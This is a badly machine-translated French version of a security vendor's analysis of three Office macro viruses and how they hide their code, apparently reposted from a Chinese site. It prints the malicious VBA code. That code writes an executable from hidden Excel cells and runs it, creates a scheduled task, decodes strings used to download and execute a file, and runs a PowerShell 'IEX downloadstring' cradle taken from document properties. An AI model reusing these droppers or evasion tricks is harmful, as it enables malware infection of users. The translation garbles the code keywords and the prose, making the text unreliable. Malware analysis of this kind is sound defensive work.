A propos de 0x00

En tant que classe de virus anciens, les virus macro et avec la mont�e du retour ransomware. Surtout en 2016, avec Locky repr�sent� l'extorsion g�n�ralis�e de propagation des macros Office d'utilisation du logiciel, le virus de macro est devenue l'une des esp�ces de virus pr�sente le plus actif.

Dans la confrontation avec le logiciel de s�curit�, les virus macro utilisent divers moyens pour cacher leur code malveillant ou de donn�es, l'�mergence r�cente de nouvelles variantes est d'utiliser la fonction de feuille de calcul Excel g�n�rer dynamiquement des donn�es de fichier PE, mis en place l'emplacement de stockage � distance, affichage cach�, diff�rent etc peau de commutation de table. Ensuite, l'�quipe du moteur 360QEX sera le code du virus macro trois un � Invisibilit� � populaire par un secret.

tableur Excel 0x01 aux donn�es masquer

Exemples de fichiers md5: 48f202f903741e7a1722bfa6b4c051aa.xls
SHA256: 083a05000c4b8e9a88a0ff8a95a3d9826dd389b440bb1781237ca124b0d986a7

les r�sultats d'analyse VirusTotal:

�chantillon VBAProject lui-m�me est crypt�,

Apr�s la pause, nous avons vu la mise en uvre de la fonction de saisie du code macro Auto_Open,

Sub Auto_Open () On Error Resume Next Application.DisplayAlerts = False Dim WB Comme classeur Set WB = ActiveWorkbook Dim SH1 SH2, SH3 comme feuille de travail Set Sh1 = WB.Sheets (1) Set Sh2 = WB.Sheets (2) Set SH3 = WB.Sheets (3) Dim de As String str = Sh2.Cells (996, 40) Dim t As Date t = Maintenant + TimeSerial (0, 0, 1) Application.OnTime t, str End Sub

Les auteurs de virus utilisent des fonctions Application.OnTime, 1 seconde d'intervalle, effectuez cha�ne � str �, la valeur de � str � est acquise � partir des cellules de table (996, 40), lorsque le virus se trouve dans le tableau pour voir o� la valeur des changements dans Excel format de cellule, la dissimulation de donn�es d'affichage.

Lorsque les trois cellules mise en forme ;;;, le contenu des cellules seront cach�s.

Format de cellule est un d�faut, l'ensemble initial,

Apr�s avoir enlev� la peau, la valeur dans la vue de la table est Fnslr12, � savoir le nom de la fonction de la fonction d'entr�e du virus, le code de fonction,

Sous Fnslr12 () On Error Resume Next Application.DisplayAlerts = False appel de construction Feuilles (1) .Select Dim WB Comme classeur Set WB = ActiveWorkbook Dim SH1 SH2, SH3 comme feuille de travail Set Sh1 = WB.Sheets (1) Set Sh2 = WB.Sheets (2) Si les cellules (2, 1) < > �� Alors GoTo skyhigh End If � � � Ci-apr�s abr�g�

Ainsi, la fonction principale de ce code de fonction est un virus.

Cette fonction est l�,

1, Appel de construction

Construire appel de fonction, la fonction build fonction: g�n�r�e dynamiquement dans le tableau, les donn�es n�cessaires pour �crire des fichiers ex�cutables (fichiers PE), dont le code fonction bri�vement comme suit,

Sous Construction () Feuilles (2) .Select Set WB = ActiveWorkbook Set Sh1 = WB.Sheets (1) Set Sh2 = WB.Sheets (2) � Emplacement Bob i = Sh2.Cells (1000, 12) j = Sh2.Cells (1000, 13) � Emplacement de la table Index R = Sh2.Cells (1000, 10) C = Sh2.Cells (1000, 11) Compteur = R Do While Sh2.Cells (compteur, C) < > �' " Si Sh2.Cells (compteur, C + 1) < > �� Alors S1 = Sh2.Cells (Compteur, C) S2 = Sh2.Cells (Compteur, C + 1) End If Compteur = Compteur + 1 boucle Les cellules (i, j) .Select Gamme (s�lection, Selection.End (xlDown)). S�lectionnez Selection.Cut Range ( "i1001"). S�lectionnez ActiveSheet.Paste Les cellules (1, 1) .Select End Sub

En fonction des r�sultats d'exploitation en 1001 sur la ligne, chacune des donn�es de remplissage de ligne de mani�re s�quentielle.

2, que ce soit pour ex�cuter une fois pour les tests

Si les cellules (2, 1) < > �� Alors GoTo skyhigh End If

Lorsqu'il est ex�cut� une fois apr�s, les cellules (2,1) Le tableau de valeur est �crite, sera ici pour entrer dans la d�claration Effectuez ensuite la mention � Aller � skyhigh �, � skyhigh � marque est positionn�e � la fonction de queue, � savoir la mise en uvre de la d�claration quittera la fonction.

estimation intention du code, les auteurs de virus � g�n�rer un fichier nomm� VBS Macro1.vbs en% userprofile% AppDataRoamingMicrosoftTemplates,

Dim Fnslr1 As String Dim Fnslr2 As String Fnslr2 = (environnent Sh2.Cells (998, 40)) et "AppDataRoamingMicrosoftTemplatesMacro1.vbs" ChDrive (Fnslr2) Si Dir (Fnslr2) = "" Ensuite, autre End If

O�, le chemin du r�pertoire pour g�n�rer un fichier de patchwork de virus lu � partir des cellules de table (998, 40) 2, la valeur de la userprofile variable d'environnement.

Mais, les auteurs de virus ne continuent d'am�liorer le code correspondant. Les �chantillons de test de fonctionnement r�els ne sont pas aussi g�n�rer le fichier, les auteurs sp�culent sur le suivi possible de se joindre � la fonction ou la fonction a �t� annul�e.

En% serprofile% AppDataRoamingMicrosoftTemplates r�pertoire un fichier ex�cutable Macro1.exe,

Dim i As Double i = 1000 Fnslr1 = "Macro1.exe" Fnslr2 = (environnent Sh2.Cells (998, 40)) et "AppDataRoamingMicrosoftTemplates" Fnslr3 = FreeFile () Ouvrez Fnslr1 Pour binaire Fnslr3 Do While Sh2.Cells (i, 9) < > �' " Fnslr11 = Sh2.Cells (i, 9) Si (Fnslr9 = True) then Fnslr8 = 1 Do While (Fnslr8 < �Len (Fnslr11)) Fnslr6 = Sh2.Cells (997, 40) & Mid (Fnslr11, Fnslr8, 3) Mettez # Fnslr3 ,, Fnslr6 Fnslr8 = Fnslr8 + 3 boucle End If Si Fnslr9 = False Then Fnslr9 = True End If i = i + 1 boucle Fermer # Fnslr3 Dim Fnslr10 As String Fnslr10 = Fnslr1 Fnslr7 = Shell (Fnslr10, vbHide) Dim i As Double i = 1000 Fnslr1 = "Macro1.exe" Fnslr2 = (environnent Sh2.Cells (998, 40)) et "AppDataRoamingMicrosoftTemplates" Fnslr3 = FreeFile () Ouvrez Fnslr1 Pour binaire Fnslr3 Do While Sh2.Cells (i, 9) < > �' " Fnslr11 = Sh2.Cells (i, 9) Si (Fnslr9 = True) then Fnslr8 = 1 Do While (Fnslr8 < �Len (Fnslr11)) Fnslr6 = Sh2.Cells (997, 40) & Mid (Fnslr11, Fnslr8, 3) Mettez # Fnslr3 ,, Fnslr6 Fnslr8 = Fnslr8 + 3 boucle End If Si Fnslr9 = False Then Fnslr9 = True End If i = i + 1 boucle Fermer # Fnslr3 Dim Fnslr10 As String Fnslr10 = Fnslr1 Fnslr7 = Shell (Fnslr10, vbHide)

Macro1.exe requis pour l'�criture de donn�es � partir des cellules de feuille de calcul Excel 1001 lignes (997, 40) autour de la lecture, la position de d�part est les donn�es d'essais,

les codes de fonction Shell utilisent la queue, d�marrer Macro1.exe g�n�r�.

Informations sur l'image

ex�cutable X64 bits est la fonction que le powershell vient param�tres de d�marrage -enc, la mise en uvre d'un shellcode, ce shellcode est une coquille inverse, les pirates connexion serveur et attendre les ordres.

Cette section est cr��e avec l'offre un fonctionnement sans interruption des t�ches planifi�es r�sonna et cette partie ne fait l'objet de cet article, aucun d�tail.

Dans le r�pertoire% serprofile% AppDataRoamingMicrosoftTemplates g�n�rent chauve-souris fichier script batch (cmd) Macro1.bat,

Fnslr2 = (environnent Sh2.Cells (998, 40)) et "AppDataRoamingMicrosoftTemplates" Dim utilisateur As String Utilisateur = (environnent Sh2.Cells (998, 40)) FNAME = Fnslr2 & "Macro1.bat" FNum = FreeFile Ouvrir Fname Pour la sortie d'acc�s en �criture Comme #FNum WholeLine = "SCHTASKS / Cr�er / SC HORAIRES / TN" & Sh2.Cells (1000, 3) et "Macro1" & Sh2.Cells (1000, 3) et "/ TR" & "" & utilisateur et "AppDataRoamingMicrosoftTemplates" & " Macro1.exe / ST 01h00 " Imprimer #FNum, WholeLine Fermer #FNum Dim TempFileName As String TempFileName = Fnslr2 & "Macro1.bat" Shell TempFileName, vbHide

Queue en utilisant la fonction Shell pour lancer le script, le r�sultat est la machine de l'utilisateur pour cr�er une t�che planifi�e pour ex�cuter une fois par Macro1.exe g�n�r� un heure ci-dessus.

6, affichage contextuel saisir le mot de passe pour continuer � fonctionner

pword = InputBox ( � S'il vous pla�t entrer un mot de passe pour continuer �, � Mot de passe requis �, � ******* �) Choisir le cas pword Case Is = "" MsgBox "Try Again" Cas � Alon2016 � RP = 1 cas Est < > �"Alon2016" MsgBox "Try Again" End Select

Conna�tre le code du virus, le mot de passe requis est � Alon2016 �.

Suivant est le nettoyage du site et camouflent, retirez l'appel � la fonction de construction dans le tableau de donn�es g�n�r�es, stock�es dans d'autres tables remplies courrier informations d'adresse du destinataire dans une position de premier plan au d�but de la table,

R�sum�: Il est si sp�cial au sujet de cet �chantillon:

les donn�es de fichier PE est g�n�r� dynamiquement en utilisant une fonction

Les donn�es stock�es dans une feuille de calcul Excel, en utilisant un �cran cach�

emplacement de stockage des donn�es loin, pas facile � voir

Virus dans diff�rents tableau Excel pour commutateur, pour analyser plus difficile � d�boguer le code VBA

Le virus a fini d'ex�cuter, nettoyer le site, affiche une liste d'adresses e-mail, de se cacher

0x02 VBA formulaire utilisateur code-behind

De tels virus cach�s partie du code au projet VBA de contr�le de l'utilisateur (formulaire utilisateur), m�me dans le contr�le avec le code est r�duit au minimum, de sorte qu'il ne peut pas �tre vu facilement.

Exemples de fichiers md5: 9266db6c7772f6c45411ff3a591b1374
SHA256: 9d11f2d2f0e0e5fd8a2ef552a5521920767d7939881443435296d0c600e4a71a

les r�sultats d'analyse VirusTotal:

Macro vue du fichier,

Ce document ressemble � une des op�rations SQL normales comme code de macro, mais a constat� que lorsque nous consid�rons la forme Ultra,

L�gende avoir un contr�le des donn�es stock�es comme suspect,

D! Icrobrioft.XD! LHTTP10) Adodb.britr00aD! 10) brih00ll.Application10) Wbricript.brih00ll10) Proc00bribri10) G00T10) T00D! P10) Typ0010) op00n10) writ0010) r00briponbri00Body10) briav00tofil0010) hendib00.00x00

Ces donn�es de position est utilis�e comme code dans la macro,

CadenaCurrency (Ultra.CommandButton3.Caption, "00", "e")

Ce qui, CadenaCurrency Replace est un simple appel,

Fonction publique CadenaCurrency (A1 As String, A2 As String, A3 As String) As String CadenaCurrency = Remplacer (A1, A2, A3) End Function

Proc�d� de d�chiffrement qui,

Dim aproblems As String aproblems = CadenaCurrency (Ultra.CommandButton3.Caption, "00", "e") aproblems = CadenaCurrency (aproblems, "D", "M") aproblems = CadenaCurrency (aproblems, "bri", "s") constans_problems = split (aproblems, "10)")

d�crypt�e,

Microsoft.XMLHTTP Adodb.stream Shell.Application Wscript.shell processus GeT Temp type ouvert �criture responseBody SaveToFile hendibe.exe

Plusieurs cha�nes montrent une intention tr�s claire, t�l�chargement (Microsoft.XMLHTTP) + fichiers d'�criture (Adodb.stream) + ex�cution (Shell.Application / Wscript.shell).

Cet exemple parce que le code en question, n'a pas r�ussi et en cours d'ex�cution. Trouver le code de macro en utilisant les fichiers de t�l�chargement Position objet de Microsoft.XMLHTTP, plus le d�bogage point d'arr�t, d'abord en raison de la n�gligence, oubli� d'�crire un guillemet, la compilation �choue,

Ensuite, lorsque vous ex�cutez le fichier t�l�charg�, l'erreur est survenue.

0x03 propri�t� de document int�gr� code cach�

Une telle partie malveillante de noyau du virus du code int�gr� dans les propri�t�s du document.

Exemples de fichiers md5: 0ce81eda6b6886163cf5dadffecc0df9
SHA256: 23d07a51f7a14a95a1efc55ad3f18cd5a71607156cd325256d43f0b68cfb62cd

les r�sultats d'analyse VirusTotal:

code macro VBA dans cet exemple, un seul fichier, tr�s bref,

Attribut VB_Name = "NewMacros" Sub Auto_Open () appel WinShell End Sub Sub AutoOpen () appel WinShell End Sub Fonction WinShell () As Object On Error Resume Next Err.Clear Dim ps As String ps = ActiveDocument.BuiltInDocumentProperties (le "gestionnaire"). Valeur Dim Obj As Object Set Obj = CreateObject ( "WScript.Shell") Obj.Run ps, 0 Application.DisplayAlerts = False End Function

Ouvrez le document en r�ponse � deux �v�nements, Autoopen avec Auto_Open, la fonction WinShell d'ex�cution directe, fonction int�gr�e WinShell lit les attributs de fichier, les valeurs Manager, proc�dez directement. valeur Manager, nous utilisons les attributs de fichier � droite, consid�rons comme,

powershell.exe -Nop -w cach� -c $ b = new-objet net.webclient; $ b.proxy = :: GetSystemWebProxy (); $ b.Proxy.Credentials = :: DefaultCredentials, IEX $ b.downloadstring ( '

Une partie du code de script Powershell est ex�cut�, t�l�charger des fichiers � partir d'une URL sp�cifi�e ( � l'heure actuelle le test n'a pas pu acc�der � cette URL.

r�sum� 0x04

chantage Encrypted repr�sent� par le virus, de plus en plus l'utilisation des macros Office, js, VBS et autres fichiers non-Pe � la propagation. Lib�r� par le code de script ex�cutable dynamique dans le r�pertoire Windows ou t�l�charger un fichier ex�cutable � partir du serveur.

virus non PE tuer le moteur QEX est responsable de la mort de 360 produits de s�curit�, les virus macro et vbs, js, html et autres moteurs de virus de script unique. L'�chantillon est QEX ont �t� en train de tuer le moteur.

Ici aussi rappel� aux utilisateurs d'utiliser la famille Microsoft Office de documentation du logiciel,

Tels que les besoins quotidiens sans utiliser des macros, d�sactivez macros Office d�sactiv�es par r�f�rence

https://support.office.com/zh-cn/article/%E5%90%AF%E7%94%A8%E6%88%96%E7%A6%81%E7%94%A8-Office-% E6% 96% 87% E6% A1% A3% E4% B8% AD% E7% 9A% 84% E5% AE% 8F-7b4fdd2e-174f-47e2-9611-9efe4f860b12

Pour les utilisateurs utilisent souvent le travail macro, installez le logiciel de s�curit� et base de donn�es de virus de la mise � jour r�guli�rement, d'autres envoy�s au document, s'il vous pla�t scanner avant de l'ouvrir.

Article original, auteur: Drops, reproduit � partir de: http: //www.mottoin.com/tech/115043.html, ont coup�

Route de la soie

Apprenez � conna�tre la Chine

Secret technique: le code du virus Macro trois Invisibilit�

A propos de 0x00

tableur Excel 0x01 aux donn�es masquer

0x02 VBA formulaire utilisateur code-behind

0x03 propri�t� de document int�gr� code cach�

r�sum� 0x04